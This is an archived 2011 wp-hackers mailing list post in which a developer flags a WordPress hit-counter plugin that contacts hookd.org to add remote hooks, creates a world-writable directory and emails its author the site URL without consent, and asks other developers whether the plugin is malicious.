[wp-hackers] Hookd? Sketchy Plugin Include

Jackson Whelan jw at jacksonwhelan.com
Tue Sep 13 22:28:01 UTC 2011


Howdy,

Trying to help someone in the forums complaining about a plugin 
(http://wordpress.org/extend/plugins/hit-counter-ultimate/) causing 
their site to crawl, and stumbled across this included file which looks 
like it could be used for great malfeasance.

     
http://plugins.svn.wordpress.org/hit-counter-ultimate/trunk/class.resource.php

Makes calls to hookd.org and requests actions and filters to be added. 
Creates a world-writable directory while it's at it as well.

Is anyone familiar with hookd.org? Am I paranoid for thinking this is 
dubious?

As a bonus the plugin emails the author with the URL of the site it was 
activated on, with no user consent or knowledge.

     http://plugins.svn.wordpress.org/hit-counter-ultimate/trunk/image.php

Which would make sense as it would allow them to fine tune the junk they 
deploy.

I found this related post in the forums from a year ago.

     http://wordpress.org/support/topic/my-site-hacked?replies=14

I've already emailed plugins at wordpress.org, but thought I'd ask if 
anyone here was aware of this.

No comment on hit counters being used in 2011, but if you'd like to step 
into the wayback machine just look at the screenshots : )

Thanks! Jackson


More information about the wp-hackers mailing list